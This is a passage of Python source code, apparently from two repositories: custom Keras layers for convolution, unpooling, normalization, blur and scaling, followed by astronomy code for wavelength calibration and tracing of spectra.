x, y = [tf.reshape(i, [1, *i.get_shape(), 1]) for i in [x, y]] # shape [1, h, w, 1]
x, y = [tf.image.extract_patches(i,
[1, *self.kernel_size, 1],
[1, *self.strides, 1],
[1, *self.dilation_rate, 1],
'VALID')
for i in [x, y]] # shape [1, out_h, out_w, filter_h * filter_w]
return y, x
@staticmethod
def _get_pixel_values_at_point(inputs, indices):
"""get pixel values
:param inputs:
:param indices: shape [batch_size, H, W, I], I = filter_h * filter_w * channel_out
:return:
"""
y, x = indices
batch, h, w, n = y.shape.as_list()[0: 4]
y_shape = tf.shape(y)
batch, n = y_shape[0], y_shape[3]
batch_idx = tf.reshape(tf.range(0, batch), (batch, 1, 1, 1))
b = tf.tile(batch_idx, (1, h, w, n))
pixel_idx = tf.stack([b, y, x], axis=-1)
return tf.gather_nd(inputs, pixel_idx)
class DepthwiseConv2D(Conv2DBaseLayer):
"""2D depthwise convolution layer.
# Notes
A DepthwiseConv2D layer followed by an 1x1 Conv2D layer is equivalent
to the SeparableConv2D layer provided by Keras.
# References
[Xception: Deep Learning with Depthwise Separable Convolutions](http://arxiv.org/abs/1610.02357)
"""
def __init__(self, depth_multiplier, kernel_size,
kernel_initializer=depthwiseconv_init_relu,
**kwargs):
super(DepthwiseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.depth_multiplier = depth_multiplier
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
kernel_shape = (*self.kernel_size, feature_shape[-1], self.depth_multiplier)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(feature_shape[-1]*self.depth_multiplier,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(DepthwiseConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
else:
features = inputs
features = K.depthwise_conv2d(features, self.kernel,
strides=self.strides,
padding=self.padding,
dilation_rate=self.dilation_rate)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, feature_shape[-1]*self.depth_multiplier]
return feature_shape
def get_config(self):
config = super(DepthwiseConv2D, self).get_config()
config.update({
'depth_multiplier': self.depth_multiplier,
})
return config
class MaxPoolingWithArgmax2D(Layer):
'''MaxPooling for unpooling with indices.
# References
[SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)
# related code:
https://github.com/PavlosMelissinos/enet-keras
https://github.com/ykamikawa/SegNet
'''
def __init__(self, pool_size=(2, 2), strides=(2, 2), padding='same', **kwargs):
super(MaxPoolingWithArgmax2D, self).__init__(**kwargs)
self.pool_size = conv_utils.normalize_tuple(pool_size, 2, 'pool_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
def call(self, inputs, **kwargs):
ksize = [1, self.pool_size[0], self.pool_size[1], 1]
strides = [1, self.strides[0], self.strides[1], 1]
padding = self.padding.upper()
output, argmax = nn_ops.max_pool_with_argmax(inputs, ksize, strides, padding)
argmax = tf.cast(argmax, K.floatx())
return [output, argmax]
def compute_output_shape(self, input_shape):
ratio = (1, 2, 2, 1)
output_shape = [dim // ratio[idx] if dim is not None else None for idx, dim in enumerate(input_shape)]
output_shape = tuple(output_shape)
return [output_shape, output_shape]
def compute_mask(self, inputs, mask=None):
return 2 * [None]
def get_config(self):
config = super(MaxPoolingWithArgmax2D, self).get_config()
config.update({
'pool_size': self.pool_size,
'strides': self.strides,
'padding': self.padding,
})
return config
class MaxUnpooling2D(Layer):
'''Inversion of MaxPooling with indices.
# References
[SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)
# related code:
https://github.com/PavlosMelissinos/enet-keras
https://github.com/ykamikawa/SegNet
'''
def __init__(self, size=(2, 2), **kwargs):
super(MaxUnpooling2D, self).__init__(**kwargs)
self.size = conv_utils.normalize_tuple(size, 2, 'size')
def call(self, inputs, output_shape=None):
updates, mask = inputs[0], inputs[1]
mask = tf.cast(mask, 'int32')
input_shape = tf.shape(updates, out_type='int32')
# calculation new shape
if output_shape is None:
output_shape = (input_shape[0], input_shape[1] * self.size[0], input_shape[2] * self.size[1], input_shape[3])
# calculation indices for batch, height, width and feature maps
one_like_mask = K.ones_like(mask, dtype='int32')
batch_shape = K.concatenate([[input_shape[0]], [1], [1], [1]], axis=0)
batch_range = K.reshape(tf.range(output_shape[0], dtype='int32'), shape=batch_shape)
b = one_like_mask * batch_range
y = mask // (output_shape[2] * output_shape[3])
x = (mask // output_shape[3]) % output_shape[2]
feature_range = tf.range(output_shape[3], dtype='int32')
f = one_like_mask * feature_range
# transpose indices & reshape update values to one dimension
updates_size = tf.size(updates)
indices = K.transpose(K.reshape(K.stack([b, y, x, f]), [4, updates_size]))
values = K.reshape(updates, [updates_size])
ret = tf.scatter_nd(indices, values, output_shape)
return ret
def compute_output_shape(self, input_shape):
mask_shape = input_shape[1]
output_shape = [mask_shape[0], mask_shape[1] * self.size[0], mask_shape[2] * self.size[1], mask_shape[3]]
return tuple(output_shape)
def get_config(self):
config = super(MaxUnpooling2D, self).get_config()
config.update({
'size': self.size,
})
return config
class AddCoords2D(Layer):
"""Add coords to a tensor as described in CoordConv paper.
# Arguments
with_r: Boolean flag, whether the r coordinate is added or not. See paper for more details.
# Input shape
        features: 4D tensor with shape (batch_size, rows, cols, channels)
    # Output shape
        features: same as input, except channels + 2 (channels + 3 if with_r is True)
# Example
x = Conv2D(32, 3, padding='same', activation='relu')(x)
x = AddCoords2D()(x)
x = Conv2D(32, 3, padding='same', activation='relu')(x)
# Notes
Semi-convolutional Operators is an approach that is closely related to CoordConv.
# References
[An Intriguing Failing of Convolutional Neural Networks and the CoordConv Solution](http://arxiv.org/abs/1807.03247)
[Semi-convolutional Operators for Instance Segmentation](https://arxiv.org/abs/1807.10712)
"""
def __init__(self, with_r=False, **kwargs):
super(AddCoords2D, self).__init__(**kwargs)
self.with_r = with_r
def call(self, features):
y_dim = features.shape[1]
x_dim = features.shape[2]
ones = tf.ones_like(features[:,:,:,:1])
y_range = tf.range(y_dim, dtype='float32') / tf.cast(y_dim-1, 'float32') * 2 - 1
x_range = tf.range(x_dim, dtype='float32') / tf.cast(x_dim-1, 'float32') * 2 - 1
yy = ones * y_range[None, :, None, None]
xx = ones * x_range[None, None, :, None]
if self.with_r:
rr = tf.sqrt(tf.square(yy-0.5) + tf.square(xx-0.5))
features = tf.concat([features, yy, xx, rr], axis=-1)
else:
features = tf.concat([features, yy, xx], axis=-1)
return features
def compute_output_shape(self, input_shape):
output_shape = list(input_shape)
output_shape[3] = output_shape[3] + 2
if self.with_r:
output_shape[3] = output_shape[3] + 1
return tuple(output_shape)
def get_config(self):
config = super(AddCoords2D, self).get_config()
config.update({
'with_r': self.with_r,
})
return config
class LayerNormalization(Layer):
"""Layer Normalization Layer.
# References
[Layer Normalization](http://arxiv.org/abs/1607.06450)
"""
def __init__(self, eps=1e-6, **kwargs):
super(LayerNormalization, self).__init__(**kwargs)
self.eps = eps
def build(self, input_shape):
self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],
initializer=initializers.Ones(), trainable=True)
self.beta = self.add_weight(name='beta', shape=input_shape[-1:],
initializer=initializers.Zeros(), trainable=True)
super(LayerNormalization, self).build(input_shape)
def call(self, x):
mean = tf.stop_gradient(K.mean(x, axis=-1, keepdims=True))
std = tf.stop_gradient(K.std(x, axis=-1, keepdims=True))
return self.gamma * (x - mean) / (std + self.eps) + self.beta
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(LayerNormalization, self).get_config()
config.update({
'eps': self.eps,
})
return config
class InstanceNormalization(Layer):
"""Instance Normalization Layer.
# References
[Instance Normalization: The Missing Ingredient for Fast Stylization](https://arxiv.org/abs/1607.08022)
"""
def __init__(self, eps=1e-6, **kwargs):
super(InstanceNormalization, self).__init__(**kwargs)
self.eps = eps
def build(self, input_shape):
self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],
initializer=initializers.Ones(), trainable=True)
self.beta = self.add_weight(name='beta', shape=input_shape[-1:],
initializer=initializers.Zeros(), trainable=True)
super(InstanceNormalization, self).build(input_shape)
def call(self, x):
axis = list(range(len(x.shape))[1:-1])
mean = tf.stop_gradient(K.mean(x, axis=axis, keepdims=True))
std = tf.stop_gradient(K.std(x, axis=axis, keepdims=True))
return self.gamma * (x - mean) / (std + self.eps) + self.beta
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(InstanceNormalization, self).get_config()
config.update({
'eps': self.eps,
})
return config
def Resize2D(size, method='bilinear'):
"""Spatial resizing layer.
# Arguments
size: spatial output size (rows, cols)
method: 'bilinear', 'bicubic', 'nearest', ...
"""
return Lambda(lambda x: tf.image.resize(x, size, method=method))
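# Usage sketch: Resize2D returns a Lambda layer, so it drops into a functional
# model like any other layer, e.g.
#   x = Resize2D((128, 128), method='nearest')(x)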
class Blur2D(Layer):
"""2D Blur Layer as used in Antialiased CNNs for Subsampling.
# Notes
The layer handles boundary effects similar to AvgPool2D.
# References
[Making Convolutional Networks Shift-Invariant Again](https://arxiv.org/abs/1904.11486)
# related code
https://github.com/adobe/antialiased-cnns
https://github.com/adobe/antialiased-cnns/issues/10
"""
def __init__(self, filter_size=3, strides=2, padding='valid', **kwargs):
rank = 2
self.filter_size = filter_size
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.filter_size == 1:
self.a = np.array([1.,])
elif self.filter_size == 2:
self.a = np.array([1., 1.])
elif self.filter_size == 3:
self.a = np.array([1., 2., 1.])
elif self.filter_size == 4:
self.a = np.array([1., 3., 3., 1.])
elif self.filter_size == 5:
self.a = np.array([1., 4., 6., 4., 1.])
elif self.filter_size == 6:
self.a = np.array([1., 5., 10., 10., 5., 1.])
        elif self.filter_size == 7:
            self.a = np.array([1., 6., 15., 20., 15., 6., 1.])
        else:
            raise ValueError('filter_size must be an integer in [1, 7]')
super(Blur2D, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
        for i in range(len(space)):
            new_dim = conv_utils.conv_output_length(
                space[i],
                self.filter_size,
                padding=self.padding,
                stride=self.strides[i],
                dilation=1)
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, feature_shape[3]]
return feature_shape
def build(self, input_shape):
k = self.a[:,None] * self.a[None,:]
k = np.tile(k[:,:,None,None], (1,1,input_shape[-1],1))
        self.kernel = K.constant(k, dtype=K.floatx())
        super(Blur2D, self).build(input_shape)
def call(self, x):
features = K.depthwise_conv2d(x, self.kernel, strides=self.strides, padding=self.padding)
# normalize the features
mask = tf.ones_like(x)
norm = K.depthwise_conv2d(mask, self.kernel, strides=self.strides, padding=self.padding)
features = tf.multiply(features, 1./norm)
return features
def get_config(self):
config = super(Blur2D, self).get_config()
config.update({
'filter_size': self.filter_size,
'strides': self.strides,
'padding': self.padding,
})
return config
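# Usage sketch (following the antialiased-CNNs recipe from the reference above,
# not code found elsewhere in this file): replace a strided pooling op with a
# dense pooling op followed by a strided blur. MaxPooling2D is assumed to be
# the standard Keras layer.
#   x = MaxPooling2D(pool_size=2, strides=1, padding='same')(x)
#   x = Blur2D(filter_size=3, strides=2, padding='same')(x)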
class Scale(Layer):
"""Layer to learn a affine feature scaling.
"""
def __init__(self,
use_shift=True,
use_scale=True,
shift_initializer='zeros',
shift_regularizer=None,
shift_constraint=None,
scale_initializer='ones',
scale_regularizer=None,
scale_constraint=None,
**kwargs):
super(Scale, self).__init__(**kwargs)
self.use_shift = use_shift
self.use_scale = use_scale
self.shift_initializer = initializers.get(shift_initializer)
self.shift_regularizer = regularizers.get(shift_regularizer)
self.shift_constraint = constraints.get(shift_constraint)
self.scale_initializer = initializers.get(scale_initializer)
self.scale_regularizer = regularizers.get(scale_regularizer)
self.scale_constraint = constraints.get(scale_constraint)
def compute_output_shape(self, input_shape):
return input_shape
def build(self, input_shape):
if self.use_shift:
            self.shift = self.add_weight(name='shift',
                                         shape=(input_shape[-1],),
                                         initializer=self.shift_initializer,
                                         regularizer=self.shift_regularizer,
                                         constraint=self.shift_constraint,
                                         trainable=True,
                                         dtype=self.dtype)
        else:
            self.shift = None
if self.use_scale:
            self.scale = self.add_weight(name='scale',
                                         shape=(input_shape[-1],),
                                         initializer=self.scale_initializer,
                                         regularizer=self.scale_regularizer,
                                         constraint=self.scale_constraint,
                                         trainable=True,
                                         dtype=self.dtype)
else:
self.scale = None
super(Scale, self).build(input_shape)
def call(self, inputs, **kwargs):
x = inputs
if self.use_scale:
x = tf.multiply(x, self.scale)
if self.use_shift:
x = tf.add(x, self.shift)
return x
def get_config(self):
config = super(Scale, self).get_config()
config.update({
'use_shift': self.use_shift,
'use_scale': self.use_scale,
'shift_initializer': initializers.serialize(self.shift_initializer),
'shift_regularizer': regularizers.serialize(self.shift_regularizer),
'shift_constraint': constraints.serialize(self.shift_constraint),
'scale_initializer': initializers.serialize(self.scale_initializer),
'scale_regularizer': regularizers.serialize(self.scale_regularizer),
'scale_constraint': constraints.serialize(self.scale_constraint),
})
return config
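# Usage sketch: Scale learns y = scale * x + shift per channel, which is useful
# after a normalization op that carries no affine parameters of its own, e.g.
#   x = Lambda(lambda t: K.l2_normalize(t, axis=-1))(x)  # affine-free normalization
#   x = Scale()(x)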
# --- external/pyvista/python/pyvista/spectra.py | dnidever/apogee | Python | BSD-3-Clause | 36,064 bytes | 5 stars ---
import matplotlib
import matplotlib.pyplot as plt
import os
import pdb
import pickle
import copy
import scipy.signal
import scipy.interpolate
import numpy as np
from astropy.modeling import models, fitting
from astropy.nddata import CCDData, StdDevUncertainty
from astropy.io import ascii, fits
from astropy.convolution import convolve, Box1DKernel, Box2DKernel
import pyvista
from pyvista import image
from pyvista import tv
from tools import plots
ROOT = os.path.dirname(os.path.abspath(__file__)) + '/../../'
class SpecData(CCDData) :
""" Class to include a wavelength array on top of CCDData, with simple read/write/plot methods
"""
def __init__(self,data,wave=None) :
if type(data) is str :
hdulist=fits.open(data)
self.meta = hdulist[0].header
self.unit = hdulist[0].header['BUNIT']
self.data = hdulist[1].data
self.uncertainty = StdDevUncertainty(hdulist[2].data)
self.mask = hdulist[3].data
self.wave = hdulist[4].data
elif type(data) is CCDData :
self.unit = data.unit
self.meta = data.meta
self.data = data.data
self.uncertainty = data.uncertainty
self.mask = data.mask
self.wave = wave
else :
            raise ValueError('Input must be a filename or CCDData object')
def write(self,file,overwrite=True) :
hdulist=fits.HDUList()
hdulist.append(fits.PrimaryHDU(header=self.meta))
hdulist.append(fits.ImageHDU(self.data))
hdulist.append(fits.ImageHDU(self.uncertainty.array))
hdulist.append(fits.ImageHDU(self.mask.astype(np.int16)))
hdulist.append(fits.ImageHDU(self.wave))
hdulist.writeto(file,overwrite=overwrite)
def plot(self,ax,**kwargs) :
for row in range(self.wave.shape[0]) :
gd = np.where(self.mask[row,:] == False)[0]
plots.plotl(ax,self.wave[row,gd],self.data[row,gd],**kwargs)
def get_wavecal(file) :
""" load a wavecal object from disk file
"""
with open(file,'rb') as wavecal :
return pickle.load(wavecal)
class WaveCal() :
""" Class for wavelength solutions
"""
def __init__ (self,type='chebyshev',degree=2,ydegree=2,pix0=0,orders=[1]) :
""" Initialize the wavecal object
type : type of solution ('poly' or 'chebyshev')
degree : polynomial degree for wavelength
ydegree : polynomial degree for y dimension
pix0 : reference pixel
orders : spectral order for each row
spectrum : spectrum from which fit is derived
"""
self.type = type
self.degree = degree
self.ydegree = ydegree
self.pix0 = pix0
self.orders = orders
self.waves = None
self.x = None
self.y = None
self.weights = None
self.model = None
self.ax = None
def wave(self,pixels=None,image=None) :
""" Wavelength from pixel using wavelength solution model
pix : input pixel positions [x] or [y,x]
image : for input image size [nrows,ncols], return wavelengths at all pixels
returns wavelength
"""
if pixels is not None :
out=np.zeros(len(pixels[0]))
for i,pixel in enumerate(pixels[0]) :
if self.type.find('2D') > 0 :
order=self.orders[pixels[1][i]]
out[i]=self.model(pixel-self.pix0,pixels[1][i])/order
else :
out[i]=self.model(pixel-self.pix0)/self.orders[0]
return out
else :
out=np.zeros(image)
cols=np.arange(out.shape[-1])
if out.ndim == 2 :
for row in range(out.shape[0]) :
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
out[row,:] = self.model(cols-self.pix0,rows)/order
else :
out= self.model(cols-self.pix0)/self.orders[0]
return out
def getmod(self) :
""" Return model for current attributes
"""
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.degree)
elif self.type == 'chebyshev' :
mod=models.Chebyshev1D(degree=self.degree)
elif self.type == 'chebyshev2D' :
sz=self.spectrum.data.shape
mod=models.Chebyshev2D(x_degree=self.degree,y_degree=self.ydegree,
x_domain=[0,sz[1]],y_domain=[0,sz[0]])
        else :
            raise ValueError('unknown fitting type: '+self.type)
        return mod
def fit(self,plot=True) :
""" do a wavelength fit
"""
print("doing wavelength fit")
# set up fitter and model
twod='2D' in self.type
fitter=fitting.LinearLSQFitter()
mod = self.getmod()
if not hasattr(self,'ax') : self.ax = None
if twod :
nold=-1
nbd=0
while nbd != nold :
nold=nbd
self.model=fitter(mod,self.pix-self.pix0,self.y,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix,self.y])
gd = np.where(self.weights > 0)[0]
print(' rms: {:8.3f}'.format(diff[gd].std()))
bd = np.where(abs(diff) > 3*diff.std())[0]
nbd = len(bd)
print('rejecting {:d} points from {:d} total: '.format(nbd,len(self.waves)))
self.weights[bd] = 0.
if self.ax is not None :
self.ax[1].cla()
scat=self.ax[1].scatter(self.waves,diff,marker='o',c=self.y,s=2)
scat=self.ax[1].scatter(self.waves[bd],diff[bd],marker='o',c='r',s=2)
xlim=self.ax[1].get_xlim()
self.ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
self.ax[1].plot(xlim,[0,0],linestyle=':')
self.ax[1].text(0.1,0.9,'rms: {:8.3f}'.format(diff[gd].std()),transform=self.ax[1].transAxes)
cb_ax = self.fig.add_axes([0.94,0.05,0.02,0.4])
cb = self.fig.colorbar(scat,cax=cb_ax)
cb.ax.set_ylabel('Row')
plt.draw()
self.fig.canvas.draw_idle()
input(' See 2D wavecal fit. Hit any key to continue....')
else :
self.model=fitter(mod,self.pix-self.pix0,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Angstroms'.format(diff.std()))
if self.ax is not None :
# iterate allowing for interactive removal of points
done = False
ymax = self.ax[0].get_ylim()[1]
while not done :
# do fit
gd=np.where(self.weights>0.)[0]
bd=np.where(self.weights<=0.)[0]
self.model=fitter(mod,self.pix[gd]-self.pix0,self.waves[gd]*self.waves_order[gd],weights=self.weights[gd])
diff=self.waves-self.wave(pixels=[self.pix])
                print('  rms: {:8.3f} Angstroms'.format(diff[gd].std()))
# replot spectrum with new fit wavelength scale
self.ax[0].cla()
self.ax[0].plot(self.wave(image=self.spectrum.data.shape)[0,:],self.spectrum.data[0,:])
# plot residuals
self.ax[1].cla()
self.ax[1].plot(self.waves[gd],diff[gd],'go')
self.ax[1].text(0.1,0.9,'rms: {:8.3f} Angstroms'.format(diff[gd].std()),transform=self.ax[1].transAxes)
self.ax[1].set_xlabel('Wavelength')
self.ax[1].set_ylabel('obs wave - fit wave')
if len(bd) > 0 : self.ax[1].plot(self.waves[bd],diff[bd],'ro')
self.ax[1].set_ylim(diff[gd].min()-0.5,diff[gd].max()+0.5)
for i in range(len(self.pix)) :
self.ax[1].text(self.waves[i],diff[i],'{:2d}'.format(i),va='top',ha='center')
if self.weights[i] > 0 :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'g')
else :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(self.pix)) :
print('{:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, self.pix[i], self.waves[i], diff[i], self.weights[i]))
i = input(' enter ID of line to remove (-n for all lines<n, +n for all lines>n, O for new degree, return to continue): ')
if i == '' :
done = True
elif i == 'O' :
print(' current degree of fit: {:d}'.format(self.degree))
self.degree = int(input(' enter new degree of fit: '))
mod = self.getmod()
elif '+' in i :
self.weights[int(i)+1:] = 0.
elif '-' in i :
self.weights[0:abs(int(i))] = 0.
elif int(i) >= 0 :
self.weights[int(i)] = 0.
else :
print('invalid input')
def set_spectrum(self,spectrum) :
""" Set spectrum used to derive fit
"""
self.spectrum = np.atleast_2d(spectrum)
def get_spectrum(self) :
""" Set spectrum used to derive fit
"""
return self.spectrum
def identify(self,spectrum,file=None,wav=None,wref=None,disp=None,display=None,plot=None,rad=5,thresh=10,
xmin=None, xmax=None, lags=range(-300,300), nskip=1) :
""" Given some estimate of wavelength solution and file with lines,
identify peaks and centroid
"""
sz=spectrum.shape
if len(sz) == 1 :
spectrum.data = np.atleast_2d(spectrum.data)
spectrum.uncertainty.array = np.atleast_2d(spectrum.uncertainty.array)
sz=spectrum.shape
if xmin is None : xmin=0
if xmax is None : xmax=sz[-1]
nrow=sz[0]
# get initial reference wavelengths if not given
if wav is None :
pix=np.arange(sz[-1])
if self.spectrum is not None :
# cross correlate with reference image to get pixel shift
print(' cross correlating with reference spectrum using lags: ', lags)
fitpeak,shift = image.xcorr(self.spectrum.data,spectrum.data,lags)
if shift.ndim == 1 :
pixshift=(fitpeak+lags[0])[0]
print(' Derived pixel shift from input wcal: ',fitpeak+lags[0])
if display is not None :
display.plotax1.cla()
display.plotax1.text(0.05,0.95,'spectrum and reference',transform=display.plotax1.transAxes)
for row in range(spectrum.data.shape[0]) :
display.plotax1.plot(spectrum.data[row,:],color='m')
display.plotax1.plot(self.spectrum.data[row,:],color='g')
display.plotax1.set_xlabel('Pixel')
display.plotax2.cla()
display.plotax2.text(0.05,0.95,'cross correlation: {:8.3f}'.format(pixshift),
transform=display.plotax2.transAxes)
display.plotax2.plot(lags,shift)
display.plotax1.set_xlabel('Lag')
plt.draw()
input(" See spectrum and template spectrum (top), cross corrleation(bottom). hit any key to continue")
# single shift for all pixels
self.pix0 = self.pix0+fitpeak+lags[0]
wav=np.atleast_2d(self.wave(image=np.array(sz)))
else :
# different shift for each row
wav=np.zeros(sz)
cols = np.arange(sz[-1])
orders=[]
for row in range(wav.shape[0]) :
print(' Derived pixel shift from input wcal for row: {:d} {:d}'.format
(row,shift[row,:].argmax()+lags[0]),end='\r')
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
orders.append(order)
pix0 = self.pix0+fitpeak[row]+lags[0]
wav[row,:] = self.model(cols-pix0)/order
# ensure we have 2D fit
self.type = 'chebyshev2D'
self.orders = orders
print("")
else :
                # get dispersion guess from header cards if not given in disp
                if disp is None: disp=spectrum.header['DISPDW']
                if wref is not None :
                    w0=wref[0]
                    pix0=wref[1]
                else:
                    w0=spectrum.header['DISPWC']
                    pix0=sz[1]/2
wav=np.atleast_2d(w0+(pix-pix0)*disp)
# open file with wavelengths and read
if file is not None :
f=open(ROOT+'/data/lamps/'+file,'r')
lines=[]
for line in f :
if line[0] != '#' :
w=float(line.split()[0])
# if we have microns, convert to Angstroms
if w<10 : w*=10000
if w > wav.min() and w < wav.max() : lines.append(w)
lines=np.array(lines)
f.close()
else :
lines = self.waves
weights = self.weights
gd = np.where(weights >0)[0]
lines = lines[gd]
# get centroid around expected lines
x=[]
y=[]
waves=[]
waves_order=[]
weight=[]
diff=[]
if display is not None and isinstance(display,pyvista.tv.TV) :
display.ax.cla()
display.ax.axis('off')
display.tv(spectrum.data)
if plot is not None :
if type(plot) is matplotlib.figure.Figure :
plot.clf()
plt.draw()
ax1=plot.add_subplot(2,1,1)
ax2=plot.add_subplot(2,1,2,sharex=ax1)
plot.subplots_adjust(left=0.05,right=0.92, hspace=1.05)
ax=[ax1,ax2]
self.fig = plot
self.ax = ax
else :
fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,7))
fig.subplots_adjust(hspace=1.05)
self.fig = fig
self.ax = ax
if plot is not None : ax[0].cla()
for row in range(0,nrow,nskip) :
print(' identifying lines in row: ', row,end='\r')
if plot is not None :
ax[0].plot(wav[row,:],spectrum.data[row,:])
#ax[0].set_yscale('log')
ax[0].set_ylim(1.,ax[0].get_ylim()[1])
ax[0].text(0.1,0.9,'row: {:d}'.format(row),transform=ax[0].transAxes)
ax[0].set_xlabel('Rough wavelength')
ax[0].set_ylabel('Intensity')
for line in lines :
peak=abs(line-wav[row,:]).argmin()
if isinstance(display,pyvista.tv.TV) :
if (peak > xmin+rad) and (peak < xmax-rad) : display.ax.scatter(peak,row,marker='o',color='r',s=2)
if ( (peak > xmin+rad) and (peak < xmax-rad) and
((spectrum.data[row,peak-rad:peak+rad]/spectrum.uncertainty.array[row,peak-rad:peak+rad]).max() > thresh) ) :
cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
peak = int(cent)
cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
if display is not None and isinstance(display,pyvista.tv.TV) :
display.ax.scatter(cent,row,marker='o',color='g',s=2)
if plot is not None :
ax[0].text(line,1.,'{:7.1f}'.format(line),rotation='vertical',va='top',ha='center')
x.append(cent)
y.append(row)
# we will fit for wavelength*order
waves.append(line)
try: order = self.orders[row]
except: order=self.orders[0]
waves_order.append(order)
weight.append(1.)
if plot is not None :
if self.model is not None :
# if we have a solution already, see how good it is (after shift)
diff=self.wave(pixels=[x,y])-np.array(waves)
ax[1].cla()
ax[1].scatter(np.array(waves),diff,s=2,c=y)
ax[1].text(0.1,0.9,'from previous fit, rms: {:8.3f}'.format(diff.std()),transform=ax[1].transAxes)
xlim=ax[1].get_xlim()
ax[1].plot(xlim,[0,0],linestyle=':')
ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
print(" rms from old fit (with shift): {:8.3f}".format(diff.std()))
plt.figure(plot.number)
plt.draw()
input(' See identified lines. hit any key to continue....')
self.pix=np.array(x)
self.y=np.array(y)
self.waves=np.array(waves)
self.waves_order=np.array(waves_order)
self.weights=np.array(weight)
self.spectrum = spectrum
print('')
def scomb(self,hd,wav,average=True,usemask=True) :
""" Resample onto input wavelength grid
"""
#output grid
out=np.zeros(len(wav))
sig=np.zeros(len(wav))
mask=np.zeros(len(wav),dtype=bool)
# raw wavelengths
w=self.wave(image=np.array(np.atleast_2d(hd.data).shape))
for i in range(np.atleast_2d(hd).shape[0]) :
sort=np.argsort(w[i,:])
if usemask :
gd = np.where(~hd.mask[i,sort])
sort= sort[gd]
wmin=w[i,sort].min()
wmax=w[i,sort].max()
w2=np.abs(wav-wmin).argmin()
w1=np.abs(wav-wmax).argmin()
if average :
out[w2:w1] += ( np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort]) /
np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2 )
sig[w2:w1] += 1./np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2
else :
out[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort])
sig[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array**2)[i,sort])
if average :
out = out / sig
else :
sig = np.sqrt(sig)
return CCDData(out,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'fig')
except: pass
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
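# Usage sketch of the WaveCal workflow, assuming an extracted arc spectrum
# `arc` (a CCDData/SpecData object) and a lamp line list shipped under
# data/lamps/ ('henear.dat' is a hypothetical file name):
#   wcal = WaveCal(type='chebyshev', degree=3)
#   wcal.identify(arc, file='henear.dat')   # find and centroid arc lines
#   wcal.fit()                              # fit the wavelength solution
#   wave = wcal.wave(image=arc.data.shape)  # wavelength at every pixel
#   wcal.save('wavecal.pkl')                # reload later with get_wavecal()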
class Trace() :
""" Class for spectral traces
"""
def __init__ (self,inst=None, type='poly',order=2,pix0=0,rad=5,spectrum=None,model=None,sc0=None,rows=None,lags=None,channel=None) :
self.type = type
self.order = order
self.pix0 = pix0
self.spectrum = spectrum
self.rad = rad
if inst == 'TSPEC' :
self.order = 3
self.rows = [[135,235],[295,395],[435,535],[560,660],[735,830]]
self.lags = range(-75,75)
elif inst == 'DIS' :
if channel == 0 : self.rows=[[215,915]]
elif channel == 1 : self.rows=[[100,800]]
else : raise ValueError('need to specify channel')
self.lags = range(-300,300)
elif inst == 'ARCES' :
self.lags = range(-10,10)
        if rows is not None : self.rows=rows
        if lags is not None : self.lags=lags
        self.model = model
        if sc0 is not None : self.sc0=sc0
def trace(self,hd,srows,sc0=None,plot=None,thresh=20) :
